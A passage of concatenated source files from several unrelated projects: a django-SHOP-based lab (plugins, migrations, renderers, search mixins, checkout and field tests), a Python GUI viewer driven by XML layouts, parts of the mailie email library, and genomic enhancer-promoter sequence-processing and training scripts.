'shop/catalog/product-gallery.html',
])
return select_template(templates)
def render(self, context, instance, placeholder):
product_ids = []
for inline in instance.sortinline_elements.all():
try:
product_ids.append(inline.glossary['product']['pk'])
except TypeError:
pass
queryset = ProductModel.objects.filter(pk__in=product_ids, active=True)
serializer_class = app_settings.PRODUCT_SUMMARY_SERIALIZER
serialized = serializer_class(queryset, many=True, context={'request': context['request']})
# sort the products according to the order provided by `sortinline_elements`.
context['products'] = [product for id in product_ids for product in serialized.data if product['id'] == id]
return context
plugin_pool.register_plugin(ShopProductGallery)
```
#### File: shop/migrations/0003_glossary_fields.py
```python
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations
FIELD_MAPPINGS = {
'ProcessNextStepPlugin': [
('button-type', 'button_type'),
('button-size', 'button_size'),
('button-options', 'button_options'),
('quick-float', 'quick_float'),
('icon-left', 'icon_left'),
('icon-right', 'icon_right'),
],
'ShopProceedButton': [
('button-type', 'button_type'),
('button-size', 'button_size'),
('button-options', 'button_options'),
('quick-float', 'quick_float'),
('icon-left', 'icon_left'),
('icon-right', 'icon_right'),
],
}
def forwards(apps, schema_editor):
field_mappings = {}
for key, maps in FIELD_MAPPINGS.items():
field_mappings[key] = dict(maps)
migrate_glossary(apps, field_mappings)
def backwards(apps, schema_editor):
field_mappings = {}
for key, maps in FIELD_MAPPINGS.items():
field_mappings[key] = dict((m[1], m[0]) for m in maps)
migrate_glossary(apps, field_mappings)
def migrate_glossary(apps, field_mappings):
CascadeElement = apps.get_model('cmsplugin_cascade', 'CascadeElement')
for element in CascadeElement.objects.all():
if element.plugin_type not in field_mappings:
continue
glossary = dict(element.glossary)
for srckey, value in element.glossary.items():
dstkey = field_mappings[element.plugin_type].get(srckey)
if dstkey and srckey in glossary:
glossary[dstkey] = glossary.pop(srckey)
element.glossary = glossary
element.save()
class Migration(migrations.Migration):
dependencies = [
('shop', '0002_auto_20151016_1451'),
]
operations = []
if 'cmsplugin_cascade' in settings.INSTALLED_APPS:
dependencies.append(('cmsplugin_cascade', '0014_glossary_field'))
operations.append(migrations.RunPython(forwards, reverse_code=backwards))
```
#### File: shop/migrations/0005_unify_address.py
```python
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations
def forwards(apps, schema_editor):
CascadeElement = apps.get_model('cmsplugin_cascade', 'CascadeElement')
for element in CascadeElement.objects.all():
if element.plugin_type == 'BillingAddressFormPlugin':
element.plugin_type = 'CheckoutAddressPlugin'
element.glossary['address_form'] = 'billing'
element.glossary['allow_use_primary'] = element.glossary.get('allow_use_shipping', '')
element.save()
elif element.plugin_type == 'ShippingAddressFormPlugin':
element.plugin_type = 'CheckoutAddressPlugin'
element.glossary['address_form'] = 'shipping'
element.save()
def backwards(apps, schema_editor):
CascadeElement = apps.get_model('cmsplugin_cascade', 'CascadeElement')
for element in CascadeElement.objects.all():
if element.plugin_type == 'CheckoutAddressPlugin':
if element.glossary['address_form'] == 'billing':
element.plugin_type = 'BillingAddressFormPlugin'
element.glossary['allow_use_shipping'] = element.glossary.get('allow_use_primary', '')
elif element.glossary['address_form'] == 'shipping':
element.plugin_type = 'ShippingAddressFormPlugin'
element.save()
class Migration(migrations.Migration):
dependencies = [
('shop', '0004_ckeditor31'),
]
operations = []
if 'cmsplugin_cascade' in settings.INSTALLED_APPS:
dependencies.append(('cmsplugin_cascade', '0017_fake_proxy_models'))
operations.append(migrations.RunPython(forwards, reverse_code=backwards))
```
#### File: shop/rest/renderers.py
```python
from rest_framework import renderers
from rest_framework.exceptions import APIException
from shop.models.cart import CartModel
from shop.serializers.cart import CartSerializer
class TemplateContextMixin:
"""
Alternative implementation which does not pollute the template context with
the serialized data on the root scope.
"""
def get_template_context(self, data, renderer_context):
response = renderer_context['response']
if response.exception:
return dict(data, status_code=response.status_code)
else:
view = renderer_context['view']
key = getattr(view, 'context_data_name', 'data')
return {key: data}
class ShopTemplateHTMLRenderer(TemplateContextMixin, renderers.TemplateHTMLRenderer):
"""
Modified TemplateHTMLRenderer, which shall be used to render templates used by django-SHOP.
Instead of polluting the template context with the serialized data, that information is
stored inside a separate `data` attribute, which allows to add a Cart and Paginator object.
Templates created for this renderer are compatible with the `CMSPageRenderer` (see below).
"""
def render(self, data, accepted_media_type=None, renderer_context=None):
request = renderer_context['request']
response = renderer_context['response']
if response.exception:
template = self.get_exception_template(response)
template_context = self.get_template_context(data, renderer_context)
return template.render(template_context)
view = renderer_context['view']
template_names = self.get_template_names(response, view)
template = self.resolve_template(template_names)
template_context = self.get_template_context(data, renderer_context)
self.update_with_cart_context(renderer_context)
template_context.update(renderer_context, paginator=view.paginator)
return template.render(template_context, request=request)
def update_with_cart_context(self, context):
try:
cart = CartModel.objects.get_from_request(context['request'])
context['is_cart_filled'] = cart.items.exists()
cart_serializer = CartSerializer(cart, context=context, label='cart')
context['cart'] = cart_serializer.data
except (KeyError, CartModel.DoesNotExist):
pass
class CMSPageRenderer(TemplateContextMixin, renderers.TemplateHTMLRenderer):
"""
Modified TemplateHTMLRenderer, which is able to render CMS pages containing the templatetag
``{% render_placeholder ... %}``, in addition to accept ordinary Python objects in their
rendering context.
The serialized data object, as available to other REST renderers, is explicitly added to the
context as ``data``. Therefore keep in mind that templates for REST's
:class:`rest_framework.renderers.TemplateHTMLRenderer` are not compatible with this renderer.
"""
def render(self, data, accepted_media_type=None, renderer_context=None):
renderer_context = renderer_context or {}
view = renderer_context['view']
request = renderer_context['request']
response = renderer_context['response']
if not getattr(request, 'current_page', None):
msg = "APIView class '{}' with 'renderer_class=(CMSPageRenderer, ...)' can only be used by a CMSApp"
response = view.handle_exception(APIException(detail=msg.format(view.__class__)))
if response.exception:
template = self.get_exception_template(response)
template_context = self.get_template_context(data, renderer_context)
return template.render(context=template_context, request=request)
# set edit_mode, so that otherwise invisible placeholders can be edited inline
edit_mode = getattr(request.current_page, 'publisher_is_draft', False)
template_names = [request.current_page.get_template()]
template = self.resolve_template(template_names)
template_context = self.get_template_context(data, renderer_context)
template_context.update(
renderer_context,
paginator=view.paginator,
edit_mode=edit_mode,
)
return template.render(template_context, request=request)
```
#### File: shop/search/mixins.py
```python
from django.utils.translation import get_language_from_request
from django_elasticsearch_dsl.registries import registry
from shop.models.product import ProductModel
class SearchViewMixin:
def get_document(self, language):
documents = registry.get_documents([ProductModel])
try:
return next(doc for doc in documents if doc._language == language)
except StopIteration:
return next(doc for doc in documents if doc._language is None)
class ProductSearchViewMixin(SearchViewMixin):
"""
Mixin class to be added to the ProductListView to restrict that list to entities matching
the query string.
"""
search_fields = ['product_name', 'product_code']
def get_renderer_context(self):
renderer_context = super().get_renderer_context()
if renderer_context['request'].accepted_renderer.format == 'html':
renderer_context['search_autocomplete'] = True
return renderer_context
def get_queryset(self):
query = self.request.GET.get('q')
if query:
language = get_language_from_request(self.request)
document = self.get_document(language)
search = document.search().source(excludes=['body'])
search = search.query('multi_match', query=query, fields=self.search_fields, type='bool_prefix')
queryset = search.to_queryset()
else:
queryset = super().get_queryset()
return queryset
class CatalogSearchViewMixin(SearchViewMixin):
"""
Mixin class to be added to the ProductListView in order to create a full-text search.
"""
search_fields = ['product_name', 'product_code', 'body']
def get_serializer(self, *args, **kwargs):
kwargs.setdefault('label', 'search')
return super().get_serializer(*args, **kwargs)
def get_queryset(self):
language = get_language_from_request(self.request)
document = self.get_document(language)
query = self.request.GET.get('q')
search = document.search().source(excludes=['body'])
if query:
search = search.query('multi_match', query=query, fields=self.search_fields)
return search.to_queryset()
```
#### File: TIDPP-Lab3/shop/signals.py
```python
try:
import redis
except ImportError:
redis = None
from django.conf import settings
from django.dispatch import Signal
customer_recognized = Signal(providing_args=['customer', 'request'])
if redis and hasattr(settings, 'SESSION_REDIS'):
redis_con = dict((key, settings.SESSION_REDIS[key]) for key in ['host', 'port', 'db', 'socket_timeout'])
pool = redis.ConnectionPool(**redis_con)
redis_con = redis.Redis(connection_pool=pool)
else:
redis_con = type(str('Redis'), (), {'publish': lambda *args: None})()
def email_queued():
"""
If SESSION_REDIS is configured, inform a separately running worker engine, that
emails are ready for delivery. Call this function every time an email has been
handled over to the Post-Office.
"""
redis_con.publish('django-SHOP', 'send_queued_mail')
```
#### File: TIDPP-Lab3/tests/test_checkout.py
```python
import pytest
from shop.forms.checkout import ShippingAddressForm
from shop.views.address import AddressEditView
from shop.views.checkout import CheckoutViewSet
@pytest.mark.django_db
def test_customer_form(registered_customer, api_rf, empty_cart):
data = {
'customer': {
'salutation': "mr",
'first_name': "John",
'last_name': "Doe",
'email': "<EMAIL>",
'plugin_id': "1",
'plugin_order': "1",
},
}
request = api_rf.put('/shop/api/checkout/upload', data, format='json')
request.customer = registered_customer
response = CheckoutViewSet.as_view({'put': 'upload'})(request)
assert response.status_code == 200
assert registered_customer.salutation == data['customer']['salutation']
assert registered_customer.first_name == data['customer']['first_name']
assert registered_customer.last_name == data['customer']['last_name']
assert registered_customer.email == data['customer']['email']
@pytest.fixture
def address_data():
return {
'name': "<NAME>",
'address1': "31 Orwell Road",
'zip_code': "L41RG",
'city': "Liverpool",
'country': "GB",
'plugin_id': "1",
'plugin_order': "1",
}
@pytest.mark.django_db
def test_new_shipping_address(registered_customer, api_rf, empty_cart):
"""
Check that clicking on the "Add new address" returns an empty address form.
"""
request = api_rf.get('/shop/api/shipping_address/add')
request.customer = registered_customer
request.user = registered_customer.user
response = AddressEditView.as_view(form_class=ShippingAddressForm)(request, priority='add')
assert response.status_code == 200
assert response.data['shipping_address_form']['name'] is None
assert response.data['shipping_address_form']['address1'] is None
assert response.data['shipping_address_form']['zip_code'] is None
assert response.data['shipping_address_form']['city'] is None
assert response.data['shipping_address_form']['country'] is None
@pytest.mark.django_db
def test_add_shipping_address(registered_customer, api_rf, empty_cart, address_data):
data = dict(shipping_address=address_data, active_priority='add')
request = api_rf.put('/shop/api/checkout/upload', data, format='json')
request.customer = registered_customer
request.user = registered_customer.user
assert registered_customer.shippingaddress_set.count() == 0
assert registered_customer.billingaddress_set.count() == 0
response = CheckoutViewSet.as_view({'put': 'upload'})(request)
assert response.status_code == 200
assert response.data['shipping_address_form']['name'] == address_data['name']
label = "1. <NAME> – 31 Orwell Road – L41RG Liverpool – United Kingdom"
assert response.data['shipping_address_form']['siblings_summary'][0]['label'] == label
registered_customer.refresh_from_db()
assert registered_customer.billingaddress_set.count() == 0
shipping_address = registered_customer.shippingaddress_set.first()
assert shipping_address
assert shipping_address.name == address_data['name']
assert shipping_address.address1 == address_data['address1']
assert shipping_address.zip_code == address_data['zip_code']
assert shipping_address.city == address_data['city']
assert shipping_address.country == address_data['country']
@pytest.mark.django_db
def test_delete_shipping_address(registered_customer, api_rf, empty_cart, shipping_address_factory):
assert registered_customer.shippingaddress_set.count() == 0
registered_customer.shippingaddress_set.add(shipping_address_factory.create(customer=registered_customer))
registered_customer.shippingaddress_set.add(shipping_address_factory.create(customer=registered_customer))
assert registered_customer.shippingaddress_set.count() == 2
first_priority = registered_customer.shippingaddress_set.first().priority
last_priority = registered_customer.shippingaddress_set.last().priority
assert first_priority != last_priority
request = api_rf.delete('/shop/api/shipping_address/1')
request.customer = registered_customer
request.user = registered_customer.user
response = AddressEditView.as_view(form_class=ShippingAddressForm)(request, priority=first_priority)
assert response.status_code == 200
assert registered_customer.shippingaddress_set.count() == 1
assert registered_customer.shippingaddress_set.first().priority == last_priority
@pytest.mark.django_db
def test_delete_last_shipping_address(registered_customer, api_rf, empty_cart, shipping_address_factory):
registered_customer.shippingaddress_set.add(shipping_address_factory.create(customer=registered_customer))
assert registered_customer.shippingaddress_set.count() == 1
request = api_rf.delete('/shop/api/shipping_address/1')
request.customer = registered_customer
request.user = registered_customer.user
priority = registered_customer.shippingaddress_set.first().priority
response = AddressEditView.as_view(form_class=ShippingAddressForm)(request, priority=priority)
assert response.status_code == 410
assert registered_customer.shippingaddress_set.count() == 0
@pytest.mark.django_db
def test_change_shipping_address(registered_customer, api_rf, empty_cart, address_data):
data = dict(shipping_address=address_data, active_priotity=1)
request = api_rf.put('/shop/api/checkout/upload', data, format='json')
request.customer = registered_customer
response = CheckoutViewSet.as_view({'put': 'upload'})(request)
assert response.status_code == 200
shipping_address = registered_customer.shippingaddress_set.first()
assert shipping_address.id == registered_customer.cart.shipping_address.id
assert shipping_address.name == address_data['name']
assert shipping_address.address1 == address_data['address1']
assert shipping_address.zip_code == address_data['zip_code']
assert shipping_address.city == address_data['city']
assert shipping_address.country == address_data['country']
assert registered_customer.billingaddress_set.first() is None
@pytest.mark.django_db
def test_select_shipping_address(registered_customer, api_rf, empty_cart, shipping_address_factory):
assert registered_customer.shippingaddress_set.count() == 0
address1 = shipping_address_factory.create(customer=registered_customer)
registered_customer.shippingaddress_set.add(address1)
address2 = shipping_address_factory.create(customer=registered_customer)
registered_customer.shippingaddress_set.add(address2)
assert registered_customer.shippingaddress_set.count() == 2
first_priority = registered_customer.shippingaddress_set.first().priority
last_priority = registered_customer.shippingaddress_set.last().priority
assert first_priority != last_priority
request = api_rf.get('/shop/api/shipping_address/0')
request.customer = registered_customer
request.user = registered_customer.user
response = AddressEditView.as_view(form_class=ShippingAddressForm)(request, priority=first_priority)
assert response.status_code == 200
assert response.data['shipping_address_form']['name'] == address1.name
assert response.data['shipping_address_form']['address1'] == address1.address1
assert response.data['shipping_address_form']['zip_code'] == address1.zip_code
assert response.data['shipping_address_form']['city'] == address1.city
assert response.data['shipping_address_form']['country'] == address1.country
data = dict(shipping_address=response.data['shipping_address_form'])
data['shipping_address']['plugin_order'] = 1
request = api_rf.put('/shop/api/shipping_address/0', data, format='json')
request.customer = registered_customer
request.user = registered_customer.user
response = AddressEditView.as_view(form_class=ShippingAddressForm)(request)
assert response.status_code == 200
@pytest.mark.django_db
def test_use_shipping_address_for_billing(registered_customer, api_rf, empty_cart, address_data):
data = {
'shipping_address': dict(address_data, plugin_order=1, active_priority='add'),
'billing_address': {
'active_priority': 'add',
'use_primary_address': True,
'plugin_order': 2,
},
}
request = api_rf.put('/shop/api/checkout/upload', data, format='json')
request.customer = registered_customer
response = CheckoutViewSet.as_view({'put': 'upload'})(request)
assert response.status_code == 200
shipping_address = registered_customer.shippingaddress_set.first()
assert shipping_address is not None
billing_address = registered_customer.billingaddress_set.first()
assert billing_address is None
request = api_rf.get('/shop/api/checkout/digest')
request.customer = registered_customer
response = CheckoutViewSet.as_view({'get': 'digest'})(request)
assert response.status_code == 200
assert response.data['checkout_digest']['billing_address_tag'] == "Use shipping address for billing"
```
#### File: TIDPP-Lab3/tests/test_enum.py
```python
import pytest
from django.db import models
from shop.models.fields import ChoiceEnum, ChoiceEnumField
class MyChoices(ChoiceEnum):
A = 0, "My choice A"
B = 1, "My choice B"
class MyColor(ChoiceEnum):
RED = '#ff0000', "Pure red"
BLUE = '#0000ff', "Pure blue"
class MyModel(models.Model):
f = ChoiceEnumField(enum_type=MyChoices)
class Meta:
app_label = 'shop'
managed = False
def test_int_enum():
choice_a = MyChoices.A
assert isinstance(choice_a, MyChoices)
assert MyChoices.B.name == 'B'
assert MyChoices.B.value == 1
assert MyChoices.B.label == "My choice B"
choice_b = MyChoices('B')
assert str(choice_b) == "My choice B"
assert MyChoices.default == MyChoices.A
assert MyChoices.choices == [(0, "My choice A"), (1, "My choice B")]
def test_str_enum():
red = MyColor.RED
assert isinstance(red, MyColor)
assert MyColor.BLUE.name == 'BLUE'
assert MyColor.BLUE.value == '#0000ff'
assert MyColor.BLUE.label == "Pure blue"
assert MyColor.BLUE == MyColor('#0000ff')
assert str(MyColor.BLUE) == "Pure blue"
assert MyColor.choices == [('#ff0000', "Pure red"), ('#0000ff', "Pure blue")]
def test_to_python():
f = ChoiceEnumField(enum_type=MyChoices)
assert f.to_python(0) == MyChoices.A
assert f.to_python('A') == MyChoices.A
assert f.to_python(1) == MyChoices.B
with pytest.raises(ValueError):
f.to_python(None)
with pytest.raises(ValueError):
f.to_python(3)
def test_deconstruct():
f = ChoiceEnumField(enum_type=MyChoices)
name, path, args_, kwargs_ = f.deconstruct()
assert name is None
assert path == 'shop.models.fields.ChoiceEnumField'
assert args_ == []
assert kwargs_ == {}
def test_from_db_value():
f = ChoiceEnumField(enum_type=MyChoices)
assert f.from_db_value(0, None, None) is MyChoices.A
assert f.from_db_value(1, None, None) is MyChoices.B
assert f.from_db_value(2, None, None) is 2
def test_get_prep_value():
f = ChoiceEnumField(enum_type=MyChoices)
assert f.get_prep_value(MyChoices.A) is 0
assert f.get_prep_value(MyChoices.B) is 1
def test_value_to_string():
obj = MyModel(f=MyChoices.A)
assert ChoiceEnumField(name='f').value_to_string(obj) == 'A'
with pytest.raises(ValueError):
ChoiceEnumField(name='f').value_to_string(0)
```
#### File: TIDPP-Lab3/tests/test_money_db_field.py
```python
import pytest
from decimal import Decimal
from django.core.exceptions import ValidationError
from shop.money.money_maker import MoneyMaker
from shop.money.fields import MoneyField
EUR = MoneyMaker('EUR')
def test_deconstruct():
f1 = MoneyField(currency='EUR', default=EUR(0))
name, path, args, kwargs = f1.deconstruct()
f2 = MoneyField(*args, **kwargs)
assert f1.currency_code == f2.currency_code
assert f1.decimal_places == f2.decimal_places
assert f1.default == f2.default
def test_to_python():
f = MoneyField(currency='EUR', null=True)
assert f.to_python(3) == EUR('3')
assert f.to_python('3.14') == EUR('3.14')
assert f.to_python(None) == EUR()
assert f.to_python(EUR(3)) == EUR('3')
with pytest.raises(ValidationError):
f.to_python('abc')
def test_get_prep_value():
f = MoneyField(currency='EUR', null=True)
assert f.get_prep_value(EUR('3')) == Decimal('3')
def test_from_db_value():
f = MoneyField(currency='EUR', null=True)
assert f.from_db_value(Decimal('3'), None, None) == EUR('3')
assert f.from_db_value(3.45, None, None) == EUR('3.45')
assert f.from_db_value(None, None, None) is None
def test_get_default():
OneEuro = EUR(1)
f = MoneyField(currency='EUR', null=True)
assert f.get_default() is None
f = MoneyField(currency='EUR', null=True, default=EUR())
assert f.get_default() == EUR()
f = MoneyField(currency='EUR', null=False, default=OneEuro)
assert f.get_default() == OneEuro
```
#### File: tests/testshop/modifiers.py
```python
from shop.payment.modifiers import PayInAdvanceModifier
from django.utils.translation import gettext_lazy as _
class ComplexPayInAdvanceModifier(PayInAdvanceModifier):
identifier = "complex-pay-in-advance-modifier"
def get_choice(self):
return (self.identifier, _("Pay in advance with complex payment system X"))
``` |
{
"source": "2000jedi/WebViewer",
"score": 2
} |
#### File: WebViewer/Python/main.py
```python
from sys import stderr
from os.path import join, curdir
import parser
import globals
import application
reload(parser)
reload(application)
def main(app_name):
app_path = join(curdir, app_name)
xml_path = join(app_path, 'view.xml')
views = parser.parse_xml(xml_path)
try:
globals.app = __import__(app_name + '.extensions', fromlist=[app_name])
except ImportError as e:
stderr.write(e.message + '\n')
return
main_window = application.Application(views[0], views[1])
globals.views = main_window.extensions
main_window.start(views[2])
main('test')
```
#### File: WebViewer/Python/parser.py
```python
from xml.dom.minidom import parse
class Extension:
def __init__(self, exttype, name, position):
self.type = exttype
self.name = name
self.position = [int(i) for i in position.split(',')]
self.content = None
def __repr__(self):
return "%s(%s)" % (self.name, self.type)
def __str__(self):
return "%s(%s)" % (self.name, self.type)
def set_content(self, content):
self.content = content
class Framework:
def __init__(self, name, exttype, sub_framework, sub_extension, params, position):
self.name = name
self.type = exttype
self.subFramework = sub_framework
self.subExtension = sub_extension
self.params = [int(i) for i in str(params).split(',')]
self.position = [int(i) for i in position.split(',')]
def __repr__(self):
return "%s(%s)" % (self.name, self.type)
def __str__(self):
return "%s(%s)" % (self.name, self.type)
def get_text(leaf):
nodelist = leaf.childNodes
rc = []
for node in nodelist:
if node.nodeType == node.TEXT_NODE:
rc.append(node.data)
return ''.join(rc)
def tag_exist(xml, tag, default):
return str(xml.getElementsByTagName(tag)[0]) if len(xml.getElementsByTagName(tag)) == 1 else default
def specified_extension(ext, ext_type):
if ext_type == 'button':
return {
'text': get_text(ext.getElementsByTagName('text')[0])
}
if ext_type == 'label':
return {
'text': get_text(ext.getElementsByTagName('text')[0]),
'font_size': int(tag_exist(ext, 'font_size', 12))
}
if ext_type == 'text':
return {
'default': tag_exist(ext, 'default_text', ''),
'font_size': int(tag_exist(ext, 'font_size', 12))
}
if ext_type == 'pic':
return {
'image': get_text(ext.getElementsByTagName('path')[0])
}
if ext_type == 'list':
return {
'default-items': tag_exist(ext, 'default-items', '')
}
if ext_type == 'check':
return {
'default': tag_exist(ext, 'default', 'true') == 'true'
}
if ext_type == 'input':
return {
'active': tag_exist(ext, 'default', 'true') == 'true'
}
def walk(framework):
raw_frameworks = framework.getElementsByTagName('framework')
frameworks = []
for frm in raw_frameworks:
frameworks.append(walk(frm))
raw_extensions = framework.getElementsByTagName('extension')
extensions = []
for ext in raw_extensions:
ext_ = Extension(exttype=str(ext.getAttribute('type')), name=str(ext.getAttribute('name')), position=get_text(ext.getElementsByTagName('position')[0]))
ext_.set_content(specified_extension(ext, ext_.type))
extensions.append(ext_)
return Framework(framework.getAttribute('name'), framework.getAttribute('type'), frameworks, extensions, framework.getAttribute('params'), [int(i) for i in tag_exist(framework, 'position', '-1').split(',')])
def parse_xml(xml_path):
dom_tree = parse(xml_path)
elements = dom_tree.documentElement
if not elements.hasAttribute('appname') or not elements.hasAttribute('size'):
raise Exception("XML file corrupted")
title = elements.getAttribute('appname')
size = str(elements.getAttribute('size')).split('X')
raw_framework = elements.getElementsByTagName('framework')[0]
main_framework = walk(raw_framework)
return title, size, main_framework
```
#### File: Python/test/extensions.py
```python
from Python import web
def testbutton_onclick(extension, views):
class get_(web.Get):
def after_completed(self):
self.after_complete_param.set_label(self.result)
display = views['display']
get_('http://www.bilibili.com/', after_complete=display).get()
functions = {
'testbutton': {'clicked': testbutton_onclick}
}
``` |
{
"source": "2000prath/mailie",
"score": 2
} |
#### File: mailie/mailie/_auth.py
```python
class Auth:
"""
Base class for authentication schemes.
"""
def auth(self):
...
def synchronous_auth(self):
...
async def asynchronous_auth(self):
...
```
#### File: mailie/mailie/_policy.py
```python
import typing
from email.policy import HTTP
from email.policy import SMTP
from email.policy import SMTPUTF8
from email.policy import Policy
from email.policy import default
from email.policy import strict
POLICIES = {"default": default, "strict": strict, "smtp": SMTP, "smtputf8": SMTPUTF8, "http": HTTP}
def policy_factory(policy_type: typing.Union[str, Policy] = "smtp") -> Policy:
"""
Returns an immutable email policy instance based on the policy_type.
:param policy_type: The policy type to perform the lookup for, if policy_type is a Policy, it is returned
otherwise an unknown policy will assume the `SMTP` default.
:returns: The `EmailPolicy` instance.
"""
if isinstance(policy_type, Policy):
return policy_type
return POLICIES.get(policy_type.lower(), default)
```
#### File: mailie/mailie/_request.py
```python
import typing
from ._email import Email
from ._types import Auth
class Request:
def __init__(self, *, email: Email, auth: typing.Optional[Auth] = None):
self.email = email
self.auth = auth
```
#### File: mailie/mailie/_utility.py
```python
import csv
import pathlib
import typing
from ._types import EMAIL_HEADER_TYPES
from ._types import EMAIL_ITERABLE_ALIAS
def split_headers_per_rfc(
header_data: typing.Optional[typing.Iterable[str]] = None, delimiter: str = ":"
) -> typing.List[typing.List[str]]:
"""
Given an iterable of RFC compliant header strings, convert them into tuples of header field:header value pairs
ready for use within a `mailie.Email` instance. By default using the RFC compliant colon delimiter.
"""
if header_data is None:
return []
return [header.rsplit(delimiter, maxsplit=1) for header in header_data]
def emails_to_list(emails: typing.Optional[EMAIL_ITERABLE_ALIAS] = None) -> typing.List[str]:
"""
Given a single email address, or an iterable of emails, returns
distinct email addresses in a new list. if emails is not provided,
an empty list is returned.
:param emails: A single email address or iterable of emails.
"""
if emails is None:
return []
return [emails] if isinstance(emails, str) else [email for email in set(emails)]
def headers_to_list(headers: EMAIL_HEADER_TYPES = None) -> typing.List[str]:
"""
Converts the user defined headers into an RFC compliant list, offers slightly more functionality to the
user while guaranteeing the internal API is consistent.
"""
if headers is None:
return []
if isinstance(headers, typing.MutableMapping):
return [f"{key}:{value}" for key, value in headers.items()]
return list(headers)
def check_is_email(email: str):
# TODO: Validate valid emails here - easier said than done me thinks;
...
def unpack_recipients_from_csv(recipient_or_path: str) -> typing.List[str]:
"""
Given a valid path to a `.csv` file containing recipient data; parse the
file and generate a list of recipient email addresses. If the recipient
is not a valid path, it is treated as an actual email address and added
to the results.
# Todo: Treating non files as email addresses seems a little odd.
"""
results = []
recipient_or_path = recipient_or_path.strip()
path = pathlib.Path(recipient_or_path)
if path.is_file():
with open(path, newline="") as file:
email_reader = csv.reader(file, delimiter=",")
for row in email_reader:
for item in row:
results.append(item)
else:
results.append(recipient_or_path)
return results
```
#### File: tests/cli/test_help.py
```python
def test_version_execution(run_mailie):
result = run_mailie("--help")
assert result.exit_code == 0
assert "--show-completion" in result.output
```
#### File: tests/cli/test_version.py
```python
from mailie import version
def test_dash_dash_versions(run_mailie):
result = run_mailie("--version")
assert result.exit_code == 0
assert f"Mailie version: {version}\n" == result.output
```
#### File: core/unit/test_headers.py
```python
from mailie import Email
def test_subject_via_list_in_headers() -> None:
email = Email(mail_from="<EMAIL>", rcpt_to="<EMAIL>", headers=["Subject:AsList"])
assert email["Subject"] == "AsList"
def test_subject_via_mapping_in_headers() -> None:
email = Email(mail_from="<EMAIL>", rcpt_to="<EMAIL>", headers={"Subject": "AsList"})
assert email["Subject"] == "AsList"
def test_subject_as_subject_kwarg() -> None:
email = Email(mail_from="<EMAIL>", rcpt_to="<EMAIL>", subject="KeywordArg")
assert email["Subject"] == "KeywordArg"
``` |
{
"source": "20032303092/StackEPI",
"score": 3
} |
#### File: StackEPI/EPIVAN/sequence_processing.py
```python
import itertools
import numpy as np
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
def sentence2word(str_set):
word_seq = []
for sr in str_set:
tmp = []
for i in range(len(sr) - 5):
if ('N' in sr[i:i + 6]):
tmp.append('null')
else:
tmp.append(sr[i:i + 6])
word_seq.append(' '.join(tmp))
return word_seq
def word2num(wordseq, tokenizer, MAX_LEN):
sequences = tokenizer.texts_to_sequences(wordseq)
numseq = pad_sequences(sequences, maxlen=MAX_LEN)
return numseq
def sentence2num(str_set, tokenizer, MAX_LEN):
wordseq = sentence2word(str_set)
numseq = word2num(wordseq, tokenizer, MAX_LEN)
return numseq
def get_tokenizer():
f = ['a', 'c', 'g', 't']
c = itertools.product(f, f, f, f, f, f)
res = []
for i in c:
temp = i[0] + i[1] + i[2] + i[3] + i[4] + i[5]
res.append(temp)
res = np.array(res)
NB_WORDS = 4097
tokenizer = Tokenizer(num_words=NB_WORDS)
tokenizer.fit_on_texts(res)
acgt_index = tokenizer.word_index
acgt_index['null'] = 0
return tokenizer
def get_data(enhancers, promoters):
tokenizer = get_tokenizer()
MAX_LEN = 3000
X_en = sentence2num(enhancers, tokenizer, MAX_LEN)
MAX_LEN = 2000
X_pr = sentence2num(promoters, tokenizer, MAX_LEN)
return X_en, X_pr
# In[]:
names = ['GM12878', 'HUVEC', 'HeLa-S3', 'IMR90', 'K562', 'NHEK']
name = names[5]
train_dir = 'data/%s/train/' % name
imbltrain = 'data/%s/imbltrain/' % name
test_dir = 'data/%s/test/' % name
Data_dir = 'data/%s/' % name
print('Experiment on %s dataset' % name)
print('Loading seq data...')
enhancers_tra = open(train_dir + '%s_enhancer.fasta' % name, 'r').read().splitlines()[1::2]
promoters_tra = open(train_dir + '%s_promoter.fasta' % name, 'r').read().splitlines()[1::2]
y_tra = np.loadtxt(train_dir + '%s_label.txt' % name)
im_enhancers_tra = open(imbltrain + '%s_enhancer.fasta' % name, 'r').read().splitlines()[1::2]
im_promoters_tra = open(imbltrain + '%s_promoter.fasta' % name, 'r').read().splitlines()[1::2]
y_imtra = np.loadtxt(imbltrain + '%s_label.txt' % name)
enhancers_tes = open(test_dir + '%s_enhancer_test.fasta' % name, 'r').read().splitlines()[1::2]
promoters_tes = open(test_dir + '%s_promoter_test.fasta' % name, 'r').read().splitlines()[1::2]
y_tes = np.loadtxt(test_dir + '%s_label_test.txt' % name)
print('平衡训练集')
print('pos_samples:' + str(int(sum(y_tra))))
print('neg_samples:' + str(len(y_tra) - int(sum(y_tra))))
print('不平衡训练集')
print('pos_samples:' + str(int(sum(y_imtra))))
print('neg_samples:' + str(len(y_imtra) - int(sum(y_imtra))))
print('测试集')
print('pos_samples:' + str(int(sum(y_tes))))
print('neg_samples:' + str(len(y_tes) - int(sum(y_tes))))
# In[ ]:
X_en_tra, X_pr_tra = get_data(enhancers_tra, promoters_tra)
X_en_imtra, X_pr_imtra = get_data(im_enhancers_tra, im_promoters_tra)
X_en_tes, X_pr_tes = get_data(enhancers_tes, promoters_tes)
np.savez(Data_dir + '%s_train.npz' % name, X_en_tra=X_en_tra, X_pr_tra=X_pr_tra, y_tra=y_tra)
np.savez(Data_dir + 'im_%s_train.npz' % name, X_en_tra=X_en_imtra, X_pr_tra=X_pr_imtra, y_tra=y_imtra)
np.savez(Data_dir + '%s_test.npz' % name, X_en_tes=X_en_tes, X_pr_tes=X_pr_tes, y_tes=y_tes)
print("save over")
```
#### File: StackEPI/EPIVAN/train-for.py
```python
import math
import os
import time
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
from model import get_model
import numpy as np
from keras.callbacks import Callback
from datetime import datetime
from sklearn.metrics import roc_auc_score, average_precision_score
from sklearn.model_selection import train_test_split
def time_since(start):
s = time.time() - start
# s = 62 - start
m = math.floor(s / 60)
s -= m * 60
h = math.floor(m / 60)
m -= h * 60
return '%dh %dm %ds' % (h, m, s)
class roc_callback(Callback):
def __init__(self, val_data, name):
self.en = val_data[0]
self.pr = val_data[1]
self.y = val_data[2]
self.name = name
def on_train_begin(self, logs={}):
return
def on_train_end(self, logs={}):
return
def on_epoch_begin(self, epoch, logs={}):
return
def on_epoch_end(self, epoch, logs={}):
